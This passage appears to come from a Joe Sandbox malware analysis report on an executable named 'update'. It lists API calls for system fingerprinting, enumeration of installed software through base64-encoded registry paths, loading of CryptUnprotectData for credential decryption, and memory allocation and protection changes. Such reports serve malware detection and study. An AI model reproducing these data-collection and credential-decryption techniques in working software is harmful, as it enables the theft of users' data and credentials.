                                                                                                              • Part of subcall function 0041564C: 6BD67FA0.ADVAPI32(80000002,00000000,00000000,00020019,0041A232,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416C15,00000001), ref: 004156A9
                                                                                                              • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A232,00000000,?,000003E9), ref: 00415831
                                                                                                              • Part of subcall function 0041564C: 6BD67FA0.ADVAPI32(80000001,00000000,00000000,00020019,0041A232,0041A232,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
                                                                                                              • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A232,00000000,?,000003E9), ref: 004159F4
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProcSleepSystem$EnumMetrics$CreateFirstFreeInfoInformationProcess32SnapshotStringTimeToolhelp32Zone
                                                                                                            • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                            • API String ID: 2886010202-943277980

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 00416AF3
                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 00416B0A
                                                                                                              • Part of subcall function 004167B4: GetTimeZoneInformation.KERNEL32(?,00000000,0041688C,?,-00000001,?,?,?,00416B8B,Zone: ,?,00416CC4,?,LocalTime: ,?,00416CC4), ref: 004167F2
                                                                                                              • Part of subcall function 00415E64: GetSystemInfo.KERNEL32(0041987E,00000000,00415FF0,?,?,00000000,00000000,?,00416BA9,?,,?,Zone: ,?,00416CC4,?), ref: 00415E88
                                                                                                            • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,00416CC4,?,LocalTime: ,?,00416CC4,?,Layouts: ,?), ref: 00416BBF
                                                                                                              • Part of subcall function 004162B0: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,,?,?,), ref: 00416320
                                                                                                              • Part of subcall function 004162B0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416326
                                                                                                              • Part of subcall function 004162B0: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,), ref: 0041634E
                                                                                                              • Part of subcall function 004162B0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416354
                                                                                                              • Part of subcall function 004162B0: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE), ref: 00416393
                                                                                                              • Part of subcall function 004162B0: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416399
                                                                                                              • Part of subcall function 004162B0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001), ref: 004163AC
                                                                                                              • Part of subcall function 004162B0: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004163CB
                                                                                                            • Sleep.KERNEL32(00000001,00416CC4,00416CC4,?,?,00000001,,?,?,,?,Zone: ,?,00416CC4,?,LocalTime: ), ref: 00416BE9
                                                                                                            • Sleep.KERNEL32(00000001,00416CC4,[Soft],?,00000001,00416CC4,00416CC4,?,?,00000001,,?,?,,?,Zone: ), ref: 00416C08
                                                                                                              • Part of subcall function 0041564C: 6BD67FA0.ADVAPI32(80000002,00000000,00000000,00020019,0041A232,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416C15,00000001), ref: 004156A9
                                                                                                              • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A232,00000000,?,000003E9), ref: 00415831
                                                                                                              • Part of subcall function 0041564C: 6BD67FA0.ADVAPI32(80000001,00000000,00000000,00020019,0041A232,0041A232,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
                                                                                                              • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A232,00000000,?,000003E9), ref: 004159F4
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProcSleepSystem$EnumMetrics$CreateFirstFreeInfoInformationProcess32SnapshotStringTimeToolhelp32Zone
                                                                                                            • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                            • API String ID: 2886010202-943277980

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 00416AF3
                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 00416B0A
                                                                                                              • Part of subcall function 004167B4: GetTimeZoneInformation.KERNEL32(?,00000000,0041688C,?,-00000001,?,?,?,00416B8B,Zone: ,?,00416CC4,?,LocalTime: ,?,00416CC4), ref: 004167F2
                                                                                                              • Part of subcall function 00415E64: GetSystemInfo.KERNEL32(0041987E,00000000,00415FF0,?,?,00000000,00000000,?,00416BA9,?,,?,Zone: ,?,00416CC4,?), ref: 00415E88
                                                                                                            • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,00416CC4,?,LocalTime: ,?,00416CC4,?,Layouts: ,?), ref: 00416BBF
                                                                                                              • Part of subcall function 004162B0: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,,?,?,), ref: 00416320
                                                                                                              • Part of subcall function 004162B0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416326
                                                                                                              • Part of subcall function 004162B0: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE,?,00000001,), ref: 0041634E
                                                                                                              • Part of subcall function 004162B0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416354
                                                                                                              • Part of subcall function 004162B0: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001,?,?,?,00416BCE), ref: 00416393
                                                                                                              • Part of subcall function 004162B0: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416399
                                                                                                              • Part of subcall function 004162B0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,004165E6,?,-00000001), ref: 004163AC
                                                                                                              • Part of subcall function 004162B0: Process32FirstW.KERNEL32(00000000,0000022C), ref: 004163CB
                                                                                                            • Sleep.KERNEL32(00000001,00416CC4,00416CC4,?,?,00000001,,?,?,,?,Zone: ,?,00416CC4,?,LocalTime: ), ref: 00416BE9
                                                                                                            • Sleep.KERNEL32(00000001,00416CC4,[Soft],?,00000001,00416CC4,00416CC4,?,?,00000001,,?,?,,?,Zone: ), ref: 00416C08
                                                                                                              • Part of subcall function 0041564C: 6BD67FA0.ADVAPI32(80000002,00000000,00000000,00020019,0041A232,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416C15,00000001), ref: 004156A9
                                                                                                              • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A232,00000000,?,000003E9), ref: 00415831
                                                                                                              • Part of subcall function 0041564C: 6BD67FA0.ADVAPI32(80000001,00000000,00000000,00020019,0041A232,0041A232,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
                                                                                                              • Part of subcall function 0041564C: RegEnumKeyA.ADVAPI32(0041A232,00000000,?,000003E9), ref: 004159F4
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProcSleepSystem$EnumMetrics$CreateFirstFreeInfoInformationProcess32SnapshotStringTimeToolhelp32Zone
                                                                                                            • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                            • API String ID: 2886010202-943277980

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • 6BD67FA0.ADVAPI32(80000002,00000000,00000000,00020019,0041A232,00000000,00415B6E,?,-00000001,?,?,00000000,00000000,?,00416C15,00000001), ref: 004156A9
                                                                                                            • RegEnumKeyA.ADVAPI32(0041A232,00000000,?,000003E9), ref: 00415831
                                                                                                            • 6BD67FA0.ADVAPI32(80000001,00000000,00000000,00020019,0041A232,0041A232,00000001,?,000003E9,),?,?,00000000,00415C44,?,?), ref: 0041586C
                                                                                                            • RegEnumKeyA.ADVAPI32(0041A232,00000000,?,000003E9), ref: 004159F4
                                                                                                              • Part of subcall function 004075C0: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 00407669
                                                                                                              • Part of subcall function 004075C0: RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407642
                                                                                                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EnumFreeString$OpenQueryValue
                                                                                                            • String ID: $()$)$RGlzcGxheU5hbWU=$RGlzcGxheVZlcnNpb24=$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs$U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
                                                                                                            • API String ID: 966536320-3013244427

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSystemInfo.KERNEL32(0041987E,00000000,00415FF0,?,?,00000000,00000000,?,00416BA9,?,,?,Zone: ,?,00416CC4,?), ref: 00415E88
                                                                                                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeString$InfoSystem
                                                                                                            • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                            • API String ID: 4070941872-1038824218
                                                                                                            • Opcode ID: e4a77ee3253fb861a4c2a3d02493cf06135ca903ff001f43c894796c4b44ff40
                                                                                                            • Instruction ID: b8e48139218345cad2f297104021fa64e6aa48652e620d0ceae34b43c4c0af77
                                                                                                            • Opcode Fuzzy Hash: e4a77ee3253fb861a4c2a3d02493cf06135ca903ff001f43c894796c4b44ff40
                                                                                                            • Instruction Fuzzy Hash: 2F41F131A00108ABCB01EFD1D842BCDBFB9EF48305F51813BF504B7296D678EA4A8B59

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSystemInfo.KERNEL32(0041987E,00000000,00415FF0,?,?,00000000,00000000,?,00416BA9,?,,?,Zone: ,?,00416CC4,?), ref: 00415E88
                                                                                                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeString$InfoSystem
                                                                                                            • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                            • API String ID: 4070941872-1038824218
                                                                                                            • Opcode ID: a50302f3335d6827af2569a25b070775da19efb5e4b884c8418ec27caf2cea0b
                                                                                                            • Instruction ID: e4b56cc851b103c0b6e82843fe8d158378310d0a6374bcefbca3464089aad580
                                                                                                            • Opcode Fuzzy Hash: a50302f3335d6827af2569a25b070775da19efb5e4b884c8418ec27caf2cea0b
                                                                                                            • Instruction Fuzzy Hash: 0241E271A00109ABCB01EFD1D842FCDBBB9EF48305F51413BF504B7296D679EA468B59
                                                                                                            APIs
                                                                                                            • GetSystemInfo.KERNEL32(0041987E,00000000,00415FF0,?,?,00000000,00000000,?,00416BA9,?,,?,Zone: ,?,00416CC4,?), ref: 00415E88
                                                                                                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                                                                                                              • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeString$InfoSystem
                                                                                                            • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                            • API String ID: 4070941872-1038824218
                                                                                                            • Opcode ID: 0398860f2ddb89eef45c93336f1e12b903fa87197691463d16a48df23a7f1d2e
                                                                                                            • Instruction ID: 5334f543f3cde4c82855e693d3a9c32584cc6d37095a220752bcfb437b19b81d
                                                                                                            • Opcode Fuzzy Hash: 0398860f2ddb89eef45c93336f1e12b903fa87197691463d16a48df23a7f1d2e
                                                                                                            • Instruction Fuzzy Hash: D741E071A00109ABCB01EFD1D842FCDBBB9AF48305F51413BF504B7296D678EA4A8B59
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000000,00415D2A,?,?,?), ref: 00415CC7
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00415CCD
                                                                                                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000000,kernel32.dll,GlobalMemoryStatusEx,00000000,00415D2A,?,?,?), ref: 00415CEE
                                                                                                              • Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeGlobalLibraryLoadMemoryProcStatusString
                                                                                                            • String ID: @$GlobalMemoryStatusEx$kernel32.dll
                                                                                                            • API String ID: 420089832-3878206809
                                                                                                            • Opcode ID: e51a2f2e3b8aab1e2d8a545ab74939326a9b33ddd55ab8dc17dcebaf92260da4
                                                                                                            • Instruction ID: 391148e63b22df71c2771543718f35c183a5c4b34bdda626484a7ccee0bd3fce
                                                                                                            • Opcode Fuzzy Hash: e51a2f2e3b8aab1e2d8a545ab74939326a9b33ddd55ab8dc17dcebaf92260da4
                                                                                                            • Instruction Fuzzy Hash: 55017571A006089BD711EBA1DD46BDE77B9EB88704F51453AF500B32D1E67C6D018659
                                                                                                            APIs
                                                                                                            • RtlEnterCriticalSection.KERNEL32(0041C5B4,00000000,00401A0A), ref: 00401961
                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00401A0A), ref: 00401973
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 00401992
                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401A0A), ref: 004019D1
                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 004019FA
                                                                                                            • RtlDeleteCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 00401A04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3782394904-0
                                                                                                            • Opcode ID: 3ae4e2a3c02261fdbe57f5221ce4753408be8e9cd2f32c29f7b24f8f8c54b4ed
                                                                                                            • Instruction ID: f5b3729ab89c308c15893b8da70c4d7314be5901088e834fcff69d5c90a64892
                                                                                                            • Opcode Fuzzy Hash: 3ae4e2a3c02261fdbe57f5221ce4753408be8e9cd2f32c29f7b24f8f8c54b4ed
                                                                                                            • Instruction Fuzzy Hash: F11193B17843907ED715AB669CD1B927B969745708F50807BF100BA2F1C73DA840CF5D
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00000800), ref: 00600150
                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 00600158
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2483343238.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_600000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID: ickCount$ntdll$user32
                                                                                                            • API String ID: 2340568224-1695552900
                                                                                                            • Opcode ID: 721004d147152d0a27ac1c869d3963f0680eca72000240b2e14cdee869dbce50
                                                                                                            • Instruction ID: f9b99d4eb2402756737a400f327a5e71f55e4e3b6b46edefd89ef36a9cc23b9c
                                                                                                            • Opcode Fuzzy Hash: 721004d147152d0a27ac1c869d3963f0680eca72000240b2e14cdee869dbce50
                                                                                                            • Instruction Fuzzy Hash: 31112B319C41879FDF2E5EA2467E3EB2727BF11300F2484C9B916091D6CA704E065A5E
                                                                                                            APIs
                                                                                                              • Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E
                                                                                                            • RegCreateKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000000,00000000,00020019,00000000,?,00000000,?,00406D40,00000000,00406E52), ref: 00406C1A
                                                                                                            • RegQueryValueExW.KERNEL32(?,ProductName,00000000,00000000,?,?,?,00406D40,00000000,00406E52,?,?,?,00000006,00000000,00000000), ref: 00406C3F
                                                                                                            • RegCloseKey.KERNEL32(00000000,?,00406D40,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041874E,?), ref: 00406C60
                                                                                                            Strings
                                                                                                            • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00406C09
                                                                                                            • ProductName, xrefs: 00406C2E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocCloseCreateQueryStringValue
                                                                                                            • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                            • API String ID: 3260168215-1787575317
                                                                                                            • Opcode ID: 09c98a5aa4f7f8a43bb87bbdd4569b0506a6d9cca1e5576b00417c1847076580
                                                                                                            • Instruction ID: 11e12cba7479b8b01b9fafc70b7cecbc040d8651ce68523128cfa86d41fe4498
                                                                                                            • Opcode Fuzzy Hash: 09c98a5aa4f7f8a43bb87bbdd4569b0506a6d9cca1e5576b00417c1847076580
                                                                                                            • Instruction Fuzzy Hash: A4011E703843016BE310DA58CC81F4673E8EB48B04F104435B695EB2D0DAB4ED14975A
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNEL32(000000FF,00000000,04000000,00003000,00000040,00000000), ref: 0060029A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2483343238.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_600000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID: Pj@h$ntdll$user32
                                                                                                            • API String ID: 4275171209-2607519978
                                                                                                            • Opcode ID: afdf6a697b35bef0c0c238a92b7529aa9e73b9c10f96be1c31dc7a72d546a252
                                                                                                            • Instruction ID: dca23c05d3c367be35d89396e2e931ccc0476e677226a6eb13f9e47f75c24404
                                                                                                            • Opcode Fuzzy Hash: afdf6a697b35bef0c0c238a92b7529aa9e73b9c10f96be1c31dc7a72d546a252
                                                                                                            • Instruction Fuzzy Hash: 51F027346C8282ADFB794B714C2A7EB6F529F02310F24C59AA5D0891C5D970A90A6758
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 0040A6BF
                                                                                                            • GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 0040A6C5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID: CryptUnprotectData$crypt32.dll
                                                                                                            • API String ID: 2574300362-1827663648
                                                                                                            • Opcode ID: 6dc0792021c7f50060aa7ba59d25f2a2961755a6251dfcb882a20cdecde9314b
                                                                                                            • Instruction ID: e6c421c79dddd478bde07d5489d503c1d4cc859a9cbe04b01679e24e10095fcf
                                                                                                            • Opcode Fuzzy Hash: 6dc0792021c7f50060aa7ba59d25f2a2961755a6251dfcb882a20cdecde9314b
                                                                                                            • Instruction Fuzzy Hash: 49C08CF06A030056CA01EBB29D4A70833693B82B887180C3BB040B14E0D93E4010970F
                                                                                                            APIs
                                                                                                            • RtlInitializeCriticalSection.KERNEL32(0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401886
                                                                                                            • RtlEnterCriticalSection.KERNEL32(0041C5B4,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401899
                                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0041C5B4,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 004018C3
                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0041C5B4,0040192D,00000000,00401926,?,?,0040210A,?,?,?,?,?,00401AF9,00401D3F,00401D64), ref: 00401920
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 730355536-0
                                                                                                            • Opcode ID: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
                                                                                                            • Instruction ID: 5328ea8a61f1b3c3886908a4d7eb6976bfaff4b38786c7c23389d9dab3a387f7
                                                                                                            • Opcode Fuzzy Hash: 099da0d79779097dabcbbe4e17eced4135313adf81f8614c79238fcf2f8b4282
                                                                                                            • Instruction Fuzzy Hash: 06015BB0684390AEE719AB6A9C967957F92D749704F05C0BFE100BA6F1CB7D5480CB1E
                                                                                                            APIs
                                                                                                            • VirtualProtectEx.KERNEL32(000000FF,?,?,?), ref: 00600E1B
                                                                                                            • VirtualProtectEx.KERNEL32(000000FF,?,?,00000002,?), ref: 00600E47
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2483343238.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_600000_update.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID: jjj
                                                                                                            • API String ID: 544645111-2289343631
                                                                                                            • Opcode ID: 24ee2e3d089a4123137fec0d63f5aa274cdf28bd72bc079d480bb61aa69dcfdb
